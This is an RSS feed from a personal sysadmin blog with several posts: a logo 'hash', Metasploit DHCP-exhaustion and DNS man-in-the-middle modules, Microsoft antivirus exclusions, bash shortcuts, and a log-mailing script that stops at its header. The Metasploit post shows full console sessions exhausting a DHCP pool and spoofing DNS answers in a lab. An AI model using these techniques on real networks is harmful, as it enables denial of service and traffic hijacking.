<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>RootAdmin.co.uk &#187; admin</title>
	<atom:link href="http://rootadmin.co.uk/tag/admin/feed/" rel="self" type="application/rss+xml" />
	<link>http://rootadmin.co.uk</link>
	<description>The Blog of Liam Somerville</description>
	<lastBuildDate>Sun, 25 Jul 2010 02:15:05 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>The secret code in U.S. Cyber Command&#8217;s logo</title>
		<link>http://rootadmin.co.uk/2010/07/25/secret-code-cyber-commands-logo/</link>
		<comments>http://rootadmin.co.uk/2010/07/25/secret-code-cyber-commands-logo/#comments</comments>
		<pubDate>Sun, 25 Jul 2010 02:15:05 +0000</pubDate>
		<dc:creator>Rootadmin</dc:creator>
				<category><![CDATA[Other]]></category>
		<category><![CDATA[9ec4c12949a4f31474f299058ce2b22a]]></category>
		<category><![CDATA[admin]]></category>
		<category><![CDATA[cyber command]]></category>
		<category><![CDATA[Liam Somerville]]></category>
		<category><![CDATA[logo]]></category>
		<category><![CDATA[root]]></category>
		<category><![CDATA[rootadmin]]></category>
		<category><![CDATA[U.S]]></category>
		<category><![CDATA[U.S Cyber Command]]></category>
		<category><![CDATA[US]]></category>
		<category><![CDATA[USCYBERCOM]]></category>

		<guid isPermaLink="false">http://rootadmin.co.uk/?p=273</guid>
		<description><![CDATA[As you can see in the recently released new logo of the U.S Cyber Command their would appear to be a hidden message on the inner ring. On the of the inner ring is 9ec4c12949a4f31474f299058ce2b22a Looks like a hash to me. When you unhash it it says &#8220;USCYBERCOM plans, coordinates, integrates, synchronizes, and conducts activities [...]]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter" title="US Cyber Command Logo" src="http://l.yimg.com/a/p/us/news/editorial/d/c6/dc6b6f28fe0ef8696a2e95fd9b897612.jpeg" alt="" width="356" height="356" />As you can see in the recently released new logo of the U.S Cyber Command their would appear to be a hidden message on the inner ring.</p>
<p>On the of the inner ring is</p>
<p>9ec4c12949a4f31474f299058ce2b22a</p>
<p>Looks like a hash to me.</p>
<p>When you unhash it it says</p>
<p>&#8220;USCYBERCOM plans, coordinates, integrates, synchronizes, and conducts activities to: direct the operations and defense of specified Department of Defense information networks and; prepare to, and when directed, conduct full-spectrum military cyberspace operations in order to enable actions in all domains, ensure US/Allied freedom of action in cyberspace and deny the same to our adversaries.&#8221;</p>
<p>What a different way to get your mission statement into your logo &#8211; without actually putting it there.</p>
]]></content:encoded>
			<wfw:commentRss>http://rootadmin.co.uk/2010/07/25/secret-code-cyber-commands-logo/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DHCP Exhaustion and DNS MiTM</title>
		<link>http://rootadmin.co.uk/2010/03/14/dhcp-exhaustion-dns-mitm/</link>
		<comments>http://rootadmin.co.uk/2010/03/14/dhcp-exhaustion-dns-mitm/#comments</comments>
		<pubDate>Sun, 14 Mar 2010 23:29:30 +0000</pubDate>
		<dc:creator>Rootadmin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[admin]]></category>
		<category><![CDATA[application]]></category>
		<category><![CDATA[attack]]></category>
		<category><![CDATA[development]]></category>
		<category><![CDATA[dhcp]]></category>
		<category><![CDATA[digininja]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[ethical]]></category>
		<category><![CDATA[exhaustion]]></category>
		<category><![CDATA[fake]]></category>
		<category><![CDATA[freedom]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[jasager]]></category>
		<category><![CDATA[karma]]></category>
		<category><![CDATA[liam]]></category>
		<category><![CDATA[Liam Somerville]]></category>
		<category><![CDATA[madwifi]]></category>
		<category><![CDATA[mitm]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[ninja]]></category>
		<category><![CDATA[open source]]></category>
		<category><![CDATA[penetration]]></category>
		<category><![CDATA[projects]]></category>
		<category><![CDATA[root]]></category>
		<category><![CDATA[rootadmin]]></category>
		<category><![CDATA[rootadmin.co.uk]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[site]]></category>
		<category><![CDATA[software]]></category>
		<category><![CDATA[somerville]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[website]]></category>
		<category><![CDATA[wifi]]></category>

		<guid isPermaLink="false">http://rootadmin.co.uk/?p=265</guid>
		<description><![CDATA[DigiNinja has created a meta sploit module for a DHCP Exhaustion attack tool which continues to request DHCP addresses till it stops getting responses from the server which, as far as I can tell, means the IP pool is exhausted ( meaning  that no there are no available address&#8217;s from DHCP and a computer set [...]]]></description>
			<content:encoded><![CDATA[<p>DigiNinja has created a meta sploit module for a DHCP Exhaustion attack tool which continues to request DHCP addresses till it stops getting responses from the server which, as far as I can tell, means the IP pool is exhausted ( meaning  that no there are no available address&#8217;s from DHCP and a computer set to get a DHCP address cant get on the network &#8211; a very nice idea for a Denial of Service Attack in my oppinion.</p>
<p>He has also created a DNS Man in The Middle module which has been worked on by various people, the last being <a rel="nofollow" href="http://www.mcgrewsecurity.com/">Wesley McGrew</a> who released his version but never got round to getting it into the Metasploit Framework. The module loads a list of domains to give fake responses for and returns real results for everything else. His work on this was to add the facility to have it reload the config file without a restart by doing a look up on a pre-set domain. He also fixed a couple of minor bugs.</p>
<p>See http://www.digininja.org/metasploit/dns_dhcp_beta.php</p>
<p><strong>Usage</strong></p>
<p>You&#8217;ll need to be root to run both modules and for the DHCP module you&#8217;ll need to put the interface into promiscious mode before starting the attack so it can hear all the replies to the fake requests. The easiest way to explain how to use them is to just show the modules in use so here they are&#8230;</p>
<h3>DHCP Exhaustion</h3>
<pre><code>
msf &gt; use auxiliary/digininja/dhcp_exhaustion/exhaust
msf auxiliary(exhaust) &gt; set

Global
======

No entries in data store.

Module: dhcp_exhaustion/exhaust
===============================

  Name        Value
  ----        -----
  DHCPSERVER  255.255.255.255
  SNAPLEN     65535
  TIMEOUT     2

msf auxiliary(exhaust) &gt; run

[*] DHCP attack started
[*] DHCP offer of address: 192.168.0.53
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.54
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.55
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.56
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.57
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.58
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.59
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.60
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.52
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.51
[*] Got the ACK back, IP address allocated successfully
[*] Timeout waiting for OFFER
[*] Got a timeout, assuming DHCP exhausted. You Win
[*] Finished
[*] Auxiliary module execution completed
</code></pre>
<h3>DNS MiTM</h3>
<pre><code>
msf &gt; use auxiliary/digininja/dns_mitm/dns_mitm
msf auxiliary(dns_mitm) &gt; set

Global
======

No entries in data store.

Module: dns_mitm/dns_mitm
=========================

  Name     Value
  ----     -----
  RELOAD   digininja.reload
  SRVHOST  0.0.0.0
  SRVPORT  53

msf auxiliary(dns_mitm) &gt; run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: FILENAME, REALDNS.
msf auxiliary(dns_mitm) &gt; set FILENAME /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
FILENAME =&gt; /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
msf auxiliary(dns_mitm) &gt; set REALDNS 192.168.0.8
REALDNS =&gt; 192.168.0.8
msf auxiliary(dns_mitm) &gt; set

Global
======

No entries in data store.

Module: dns_mitm/dns_mitm
=========================

  Name      Value
  ----      -----
  FILENAME  /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
  REALDNS   192.168.0.8
  RELOAD    digininja.reload
  SRVHOST   0.0.0.0
  SRVPORT   53

msf auxiliary(dns_mitm) &gt; run
[*] Auxiliary module running as background job
msf auxiliary(dns_mitm) &gt;
[*] Loading hosts file
</code></pre>
<p>The hosts file contains a single entry</p>
<pre><code>
192.168.0.2 google.com
</code></pre>
<p>Now do some look ups, google.com and bbc.co.uk</p>
<pre><code>
nslookup
&gt; server localhost
Default server: localhost
Address: ::1#53
Default server: localhost
Address: 127.0.0.1#53
&gt; google.com
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   google.com
Address: 192.168.0.2
Name:   google.com
Address: 192.168.0.2
Name:   google.com
Address: 192.168.0.2
&gt; bbc.co.uk
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   bbc.co.uk
Address: 212.58.224.138
</code></pre>
<p>Google is middled but the BBC gets through, now add the BBC to the hosts file</p>
<pre><code>
echo "192.168.0.2 bbc.co.uk" &gt;&gt; dns.txt
</code></pre>
<p>Refresh the server by looking up the special domain and then check the BBC again</p>
<pre><code>
&gt; digininja.reload
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
*** Can't find digininja.reload: No answer
&gt; bbc.co.uk
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   bbc.co.uk
Address: 192.168.0.2
</code></pre>
<p>The BBC is now ours!</p>
]]></content:encoded>
			<wfw:commentRss>http://rootadmin.co.uk/2010/03/14/dhcp-exhaustion-dns-mitm/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Apple does its bit to battle terrorism</title>
		<link>http://rootadmin.co.uk/2010/02/14/apple-bit-battle-terrorism/</link>
		<comments>http://rootadmin.co.uk/2010/02/14/apple-bit-battle-terrorism/#comments</comments>
		<pubDate>Sun, 14 Feb 2010 22:35:33 +0000</pubDate>
		<dc:creator>Rootadmin</dc:creator>
				<category><![CDATA[Other]]></category>
		<category><![CDATA[34]]></category>
		<category><![CDATA[admin]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[clause]]></category>
		<category><![CDATA[Clause 34(g)]]></category>
		<category><![CDATA[conditions]]></category>
		<category><![CDATA[g]]></category>
		<category><![CDATA[i pod]]></category>
		<category><![CDATA[i tunes]]></category>
		<category><![CDATA[imac]]></category>
		<category><![CDATA[ipad]]></category>
		<category><![CDATA[ipod]]></category>
		<category><![CDATA[itunes]]></category>
		<category><![CDATA[Liam Somerville]]></category>
		<category><![CDATA[root]]></category>
		<category><![CDATA[rootadmin]]></category>
		<category><![CDATA[rootadmin.co.uk]]></category>
		<category><![CDATA[t&c]]></category>
		<category><![CDATA[terms]]></category>
		<category><![CDATA[terror]]></category>
		<category><![CDATA[terrorism]]></category>
		<category><![CDATA[terrorist]]></category>

		<guid isPermaLink="false">http://rootadmin.co.uk/?p=262</guid>
		<description><![CDATA[Buried in the fine print of its iTunes Store Terms and Conditions is a clause where Apple is doing its bit to foster non-proliferation.  Clause 34(g) declares in part You may not use or otherwise export or re-export the Licensed Application except as authorized by United States law and the laws of the jurisdiction in [...]]]></description>
			<content:encoded><![CDATA[<p>Buried in the fine print of its <a href="http://www.apple.com/legal/itunes/us/terms.html">iTunes Store Terms and Conditions</a> is a clause where Apple is doing its bit to foster non-proliferation.  Clause 34(g) declares in part</p>
<p><em>You may not use or otherwise export or re-export the Licensed Application except as authorized by United States law and the laws of the jurisdiction in which the Licensed Application was obtained. In particular, but without limitation, the Licensed Application may not be exported or re-exported (a) into any U.S. embargoed countries or (b) to anyone on the U.S. Treasury Department’s list of Specially Designated Nationals or the U.S. Department of Commerce Denied Person’s List or Entity List. By using the Licensed Application, you represent and warrant that you are not located in any such country or on any such list. You also agree that you will not use these products for any purposes prohibited by United States law, including, without limitation, the development, design, manufacture or production of nuclear, missiles, or chemical or biological weapons.</em></p>
<p>Notice, as I read this clause not only are terrorists — or at least those on terrorist watch lists — prohibited from using iTunes to manufacture WMD, they are also prohibited from even downloading and using iTunes.  So all the Al-Qaeda operatives holed up in the Northwest Frontier Provinces of Pakistan, dodging drone attacks while listening to Britney Spears songs downloaded with iTunes are in violation of the terms and conditions, even if they paid for the music!</p>
<p>That’ll show ‘em…</p>
]]></content:encoded>
			<wfw:commentRss>http://rootadmin.co.uk/2010/02/14/apple-bit-battle-terrorism/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft&#8217;s Virus scanning recommendations &#8211; KB822158</title>
		<link>http://rootadmin.co.uk/2009/12/29/microsofts-virus-scanning-recommendations-kb822158/</link>
		<comments>http://rootadmin.co.uk/2009/12/29/microsofts-virus-scanning-recommendations-kb822158/#comments</comments>
		<pubDate>Tue, 29 Dec 2009 02:44:36 +0000</pubDate>
		<dc:creator>Rootadmin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[admin]]></category>
		<category><![CDATA[Anti Virus scanning recommendations]]></category>
		<category><![CDATA[AV scanning recommendations]]></category>
		<category><![CDATA[avast!]]></category>
		<category><![CDATA[AVG]]></category>
		<category><![CDATA[AVIRA]]></category>
		<category><![CDATA[BitDefender]]></category>
		<category><![CDATA[eScan]]></category>
		<category><![CDATA[F-Secure]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[KB822158]]></category>
		<category><![CDATA[Liam Somerville]]></category>
		<category><![CDATA[NOD32]]></category>
		<category><![CDATA[or Windows 7]]></category>
		<category><![CDATA[root]]></category>
		<category><![CDATA[rootadmin]]></category>
		<category><![CDATA[rootadmin.co.uk]]></category>
		<category><![CDATA[Server 2003]]></category>
		<category><![CDATA[Server 2008]]></category>
		<category><![CDATA[Sophos]]></category>
		<category><![CDATA[Symantec]]></category>
		<category><![CDATA[TrustPort]]></category>
		<category><![CDATA[Virus scanning recommendations Windows Server 2008 R2]]></category>
		<category><![CDATA[Vista]]></category>
		<category><![CDATA[Windows 2000]]></category>
		<category><![CDATA[XP]]></category>

		<guid isPermaLink="false">http://rootadmin.co.uk/?p=260</guid>
		<description><![CDATA[Microsoft has made recommendations that may help you protect a computer that is running Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, Microsoft Windows 2000, Windows XP, Windows Vista, or Windows 7 from viruses. This article also contains information to help you minimize the effect of antivirus software on system and network performance. [...]]]></description>
			<content:encoded><![CDATA[<p>Microsoft has made recommendations that may help you protect a computer that is running Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, Microsoft Windows 2000, Windows XP, Windows Vista, or Windows 7 from viruses. This article also contains information to help you minimize the effect of antivirus software on system and network performance.</p>
<p><strong>For computers that are running Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, Windows 2000, Windows XP, Windows Vista, or Windows 7</strong></p>
<p>Do not scan the following files and folders. These files are not at risk of infection. If you scan these files, serious performance problems may occur because of file locking. Where a specific set of files is identified by name, exclude only those files instead of the whole folder. Sometimes, the whole folder must be excluded. Do not exclude any one of these based on the file name extension. For example, do not exclude all files that have a .dit extension. Microsoft has no control over other files that may use the same extensions as the following files:</p>
<p>Microsoft Windows Update or Automatic Update related files</p>
<p>The Windows Update or Automatic Update database file. This file is located in the following folder:<br />
%windir%\SoftwareDistribution\Datastore<br />
Exclude the Datastore.edb file.<br />
The transaction log files. These files are located in the following folder:<br />
%windir%\SoftwareDistribution\Datastore\Logs<br />
Exclude the following files:</p>
<p>Edb*.log</p>
<p>Note The wildcard character indicates that there may be several files.<br />
Res1.log. The file is named Edbres00001.jrs for Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2.<br />
Res2.log. The file is named Edbres00002.jrs for Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2.<br />
Edb.chk<br />
Tmp.edb<br />
The following files in the %windir%\security path should be added to the exclusions list:</p>
<p>*.edb<br />
*.sdb<br />
*.log<br />
*.chk</p>
<p>Note If these files are not excluded, security databases are typically corrupted, and Group Policy cannot be applied when you scan the folder. The wildcard character indicates that there may be several files. Specifically, you must exclude the following files:</p>
<p>Edb.chk<br />
Edb.log<br />
*.log<br />
Security.sdb in the &lt;drive&gt;:\windows\security\database folder</p>
<p>Group Policy related files</p>
<p>Group Policy user registry information. These files are located in the following folder:<br />
%allusersprofile%\<br />
Exclude the following file:<br />
NTUser.pol<br />
Group Policy client settings file. These files are located in the following folder:<br />
%Systemroot%\system32\GroupPolicy\<br />
Exclude the following file:<br />
registry.pol</p>
<p>For more information, click the following article numbers to view the articles in the Microsoft Knowledge Base:<br />
951059  (http://support.microsoft.com/kb/951059/ ) On a Windows Server 2003-based computer, registry-based policy settings are unexpectedly removed after a user logs on to the computer<br />
930597  (http://support.microsoft.com/kb/930597/ ) Some registry-based policy settings are lost and error messages are logged in the Application log on a Windows XP-based computer or on a Windows Vista-based computer</p>
<p><strong>For Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, and Windows 2000 domain controllers</strong></p>
<p>Because domain controllers provide an important service to clients, the risk of disruption of their activities from malicious code from a virus must be minimized. Antivirus software is the generally accepted way to lessen the risk of virus infection. Install and configure antivirus software so that the risk to the domain controller is reduced as much as possible and so that performance is affected as little as possible. The following list contains recommendations to help you configure and install antivirus software on a Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, or on a Windows 2000 domain controller:</p>
<p>Warning We recommend that you apply the following specified configuration to a test configuration to make sure that in your specific environment it does not introduce unexpected factors or compromise the stability of the system. The risk from too much scanning is that files are inappropriately flagged as having been changed. This results in too much replication in Active Directory. If testing verifies that replication is not affected by the following recommendations, you can apply the antivirus software to the production environment.</p>
<p>Note Specific recommendations from antivirus software vendors may supersede the recommendations in the article.</p>
<p>Antivirus software must be installed on all domain controllers in the enterprise. Ideally, try to install such software on all other server and client systems that have to interact with the domain controllers. It is optimal to catch the virus at the earliest point, such as at the firewall or at the client system where the virus is first introduced. This prevents the virus from ever reaching the infrastructure systems that the clients depend on.<br />
Use a version of antivirus software that is designed to work with Active Directory domain controllers and that uses the correct Application Programming Interfaces (APIs) to access files on the server. Older versions of most vendor software inappropriately change file metadata as it is scanned. This causes the File Replication Service engine to recognize a file change and therefore schedule the file for replication. Newer versions prevent this problem. For more information, click the following article number to view the article in the Microsoft Knowledge Base:<br />
815263  (http://support.microsoft.com/kb/815263/ ) Antivirus, backup, and disk optimization programs that are compatible with the File Replication service<br />
Do not use a domain controller to browse the Web or to perform any other activities that may introduce malicious code.<br />
When you can, do not use the domain controller as a file sharing server. Virus scanning software must be run against all files in those shares, and this can put an unsatisfactory load on the processor and the memory resources of the server<br />
Do not put Active Directory or FRS database and log files on NTFS file system compressed volumes.<br />
For more information, click the following article number to view the article in the Microsoft Knowledge Base:<br />
318116  (http://support.microsoft.com/kb/318116/ ) Issues with Jet Databases on compressed drives<br />
Do not scan the following files and folders. These files are not at risk of infection, and if you include them, this may cause serious performance problems because of file locking. Where a specific set of files is identified by name, exclude only those files instead of the whole folder. Sometimes, the whole folder must be excluded. Do not exclude any of these based on the file-name extension. For example, do not exclude all files that have a .dit extension. Microsoft has no control over other files that may use the same extension as those shown here.</p>
<p>Important This section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly. Therefore, make sure that you follow these steps carefully. For added protection, back up the registry before you modify it. Then, you can restore the registry if a problem occurs. For more information about how to back up and restore the registry, click the following article number to view the article in the Microsoft Knowledge Base:<br />
322756  (http://support.microsoft.com/kb/322756/ ) How to back up and restore the registry in Windows</p>
<p>Active Directory and Active Directory-related files:</p>
<p>Main NTDS database files. The location of these files is specified in the following registry key:<br />
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database File<br />
The default location is %windir%\ntds. Exclude the following files:<br />
Ntds.dit<br />
Ntds.pat<br />
Active Directory transaction log files. The location of these files is specified in the following registry key:<br />
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\Database Log Files Path<br />
The default location is %windir%\ntds. Exclude the following files:<br />
EDB*.log (The wildcard character indicates that there may be several files.)<br />
Res1.log (The file is named Edbres00001.jrs for Windows Server 2008, and Windows Server 2008 R2.)<br />
Res2.log (The file is named Edbres00001.jrs for Windows Server 2008, and Windows Server 2008 R2.)<br />
Ntds.pat<br />
Note Windows Server 2003 no longer uses the Ntds.pat file.<br />
The NTDS Working folder that is specified in the following registry key:<br />
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Working Directory<br />
Exclude the following files:<br />
Temp.edb<br />
Edb.chk</p>
<p>SYSVOL files:</p>
<p>The File Replication Service (FRS) Working folder that is specified in the following registry key:<br />
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NtFrs\Parameters\Working Directory<br />
Exclude the following files:<br />
FRS Working Dir\jet\sys\edb.chk<br />
FRS Working Dir\jet\ntfrs.jdb<br />
FRS Working Dir\jet\log\*.log<br />
The FRS Database Log files that are located in the following registry key:<br />
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\NtFrs\Parameters\DB Log File Directory<br />
The default location is %windir%\ntfrs. Exclude the following files:<br />
FRS Working Dir\jet\log\*.log (if the registry key is not set)<br />
FRS Working Dir\jet\log\edbres00001.jrs (Windows Server 2008, and Windows Server 2008 R2)<br />
FRS Working Dir\jet\log\edbres00002.jrs (Windows Server 2008, and Windows Server 2008 R2)<br />
DB Log File Directory\log\*.log (if the registry key is set)<br />
The Staging folder that is specified in the following registry key and all the Staging folder&#8217;s sub-folders:<br />
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\NtFrs\Parameters\Replica Sets\GUID\Replica Set Stage</p>
<p>The current location of the Staging folder and all its sub-folders is the file system reparse target of the replica set staging folders. Staging defaults to the following location:</p>
<p>%systemroot%\sysvol\staging areas</p>
<p>The current location of the SYSVOL\SYSVOL folder and all its sub-folders is the file system reparse target of the replica set root. The SYSVOL\SYSVOL folder defaults to the following location:</p>
<p>%systemroot%\sysvol\sysvol<br />
The FRS Preinstall folder that is in the following location:<br />
Replica_root\DO_NOT_REMOVE_NtFrs_PreInstall_Directory<br />
The Preinstall folder is always open when FRS is running.</p>
<p>In summary, the targeted and excluded list of folders for a SYSVOL tree that is placed in its default location would look similar to the following:</p>
<p>1. %systemroot%\sysvol                                                  Exclude<br />
2. %systemroot%\sysvol\domain                                           Scan<br />
3. %systemroot%\sysvol\domain\DO_NOT_REMOVE_NtFrs_PreInstall_Directory  Exclude<br />
4. %systemroot%\sysvol\domain\Policies                                  Scan<br />
5. %systemroot%\sysvol\domain\Scripts                                   Scan<br />
6. %systemroot%\sysvol\staging                                          Exclude<br />
7. %systemroot%\sysvol\staging areas                                    Exclude<br />
8. %systemroot%\sysvol\sysvol                                           Exclude</p>
<p>If any one of these folders or files have been moved or placed in a different location, scan or exclude the equivalent element.<br />
DFS</p>
<p>The same resources that are excluded for a SYSVOL replica set must also be excluded when FRS is used to replicate shares that are mapped to the DFS root and link targets on Windows Server 2008-based, Windows Server 2003-based, or Windows 2000-based member computers or domain controllers.<br />
DHCP</p>
<p>By default, DHCP files that should be excluded are present in the following folder on the server:<br />
%systemroot%\System32\DHCP<br />
Note You should exclude all files and subfolders that exist in this folder.</p>
<p>The location of DHCP files can be changed. To determine the current location of the DHCP files on the server, check the DatabasePath, DhcpLogFilePath, and BackupDatabasePath parameters under the following registry subkey:<br />
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\DHCPServer\Parameters</p>
<p><strong>For Windows Server 2008, Windows Server 2003, and Windows 2000 domain controllers </strong></p>
<p>DNS: You should exclude all files and subfolders that exist in the following folder:<br />
%systemroot%\system32\dns<br />
WINS: You should exclude all files and subfolders that exist in the following folder:<br />
%systemroot%\system32\wins</p>
<p>You can get more info here</p>
<p>http://support.microsoft.com/kb/822158</p>
]]></content:encoded>
			<wfw:commentRss>http://rootadmin.co.uk/2009/12/29/microsofts-virus-scanning-recommendations-kb822158/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Bash shell keyboard shortcuts</title>
		<link>http://rootadmin.co.uk/2009/12/10/bash-shell-keyboard-shortcuts/</link>
		<comments>http://rootadmin.co.uk/2009/12/10/bash-shell-keyboard-shortcuts/#comments</comments>
		<pubDate>Thu, 10 Dec 2009 23:53:03 +0000</pubDate>
		<dc:creator>Rootadmin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[admin]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[centos]]></category>
		<category><![CDATA[Debian]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[keyboard]]></category>
		<category><![CDATA[liam]]></category>
		<category><![CDATA[Liam Somerville]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[pclinux]]></category>
		<category><![CDATA[redhat]]></category>
		<category><![CDATA[root]]></category>
		<category><![CDATA[rootadmin.co.uk]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[shortcuts]]></category>
		<category><![CDATA[somerville]]></category>
		<category><![CDATA[suse]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://rootadmin.co.uk/?p=257</guid>
		<description><![CDATA[Here is a list of some bash keyboard shortcuts you may or may not find useful Alt + B     Move cursor backward one word on the current line Alt + F     Move cursor forward one word on the current line Ctrl + A     Go to the beginning of the line you are [...]]]></description>
			<content:encoded><![CDATA[<p>Here is a list of some bash keyboard shortcuts you may or may not find useful</p>
<p>Alt + B     Move cursor backward one word on the current line<br />
Alt + F     Move cursor forward one word on the current line<br />
Ctrl + A     Go to the beginning of the line you are currently typing on<br />
Ctrl + C     Kill whatever you are running<br />
Ctrl + D     Exit the current shell<br />
Ctrl + E     Go to the end of the line you are currently typing on<br />
Ctrl + H     Same as backspace<br />
Ctrl + K     Clear the line after the cursor<br />
Ctrl + L     Clears the Screen, similar to the clear command<br />
Ctrl + U     Clears the line before the cursor position. If you are at the end of the line, clears the entire line.<br />
Ctrl + R     Let’s you search through previously used commands<br />
Ctrl + T     Swap the last two characters before the cursor<br />
Ctrl + W     Delete the word before the cursor<br />
Ctrl + Z     Puts whatever you are running into a suspended background process. fg restores it.<br />
Esc + T     Swap the last two words before the cursor<br />
Tab         Auto-complete files and folder names</p>
]]></content:encoded>
			<wfw:commentRss>http://rootadmin.co.uk/2009/12/10/bash-shell-keyboard-shortcuts/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux : Automatically send logs daily</title>
		<link>http://rootadmin.co.uk/2009/12/09/linux-automatically-send-logs-daily/</link>
		<comments>http://rootadmin.co.uk/2009/12/09/linux-automatically-send-logs-daily/#comments</comments>
		<pubDate>Wed, 09 Dec 2009 00:50:50 +0000</pubDate>
		<dc:creator>Rootadmin</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Other]]></category>
		<category><![CDATA[admin]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[attach syslog email]]></category>
		<category><![CDATA[liam]]></category>
		<category><![CDATA[Liam Somerville]]></category>
		<category><![CDATA[messages]]></category>
		<category><![CDATA[mutt]]></category>
		<category><![CDATA[OPENVPN]]></category>
		<category><![CDATA[root]]></category>
		<category><![CDATA[rootadmin]]></category>
		<category><![CDATA[rootadmin.co.uk]]></category>
		<category><![CDATA[send logs daily]]></category>
		<category><![CDATA[send logs email]]></category>
		<category><![CDATA[send syslog email]]></category>
		<category><![CDATA[somerville]]></category>
		<category><![CDATA[Syslog]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[ufw]]></category>
		<category><![CDATA[uncomplicated firewall]]></category>
		<category><![CDATA[vsftp]]></category>

		<guid isPermaLink="false">http://rootadmin.co.uk/?p=251</guid>
		<description><![CDATA[Well below is my first attempt at a shell script, firstly understand I am no programmer! Before we look at it, my server is running OPENVPN and Uncomplicated Firewall(I&#8217;m running Ubuntu Server) So how does it work? Firstly we declare that we are using the bash shell using #!/bin/bash Next we&#8217;re setup some vairables, the [...]]]></description>
			<content:encoded><![CDATA[<p>Well below is my first attempt at a shell script, firstly understand I am no programmer!</p>
<p>Before we look at it, my server is running OPENVPN and Uncomplicated Firewall(I&#8217;m running Ubuntu Server)</p>
<p>So how does it work?</p>
<p>Firstly we declare that we are using the bash shell using<br />
#!/bin/bash</p>
<p>Next we&#8217;re setup some vairables, the first is simply formating the date and calling itself TODAYSDATE,<br />
next we set todays archive to be archive.TODAYSDATE and call its self TODAYS_ARCHIVE</p>
<p>Next we create a directory called archive.TODAYSDATE</p>
<p>Now to the best bit, we start processing the logs<br />
- We extract todays logs out of syslog<br />
- From the extracted logs we extract the firewall (Uncomplicated Firewal/ UFW) logs to a seperate file<br />
- Now extract todays messages log<br />
- From todays extracted logs extract all OPENVPN related logs to a seperate log file<br />
- Extract todays apache access.log and error.log<br />
- Provide us with the currently running processes<br />
- Zip it all up to the /archive/ folder<br />
- back back up a directory level and delete the folder called archive.TODAYSDATE<br />
- Now use mutt to attach the zip file to a email and send it</p>
<p>Now for the script &#8211; PLEASE FEEL FREE TO USE</p>
<p>#!/bin/bash<br />
# Script By Liam Somerville, www.rootadmin.co.uk<br />
# Use freely</p>
<p>#####################################################################<br />
#                        Set up the variables<br />
#####################################################################<br />
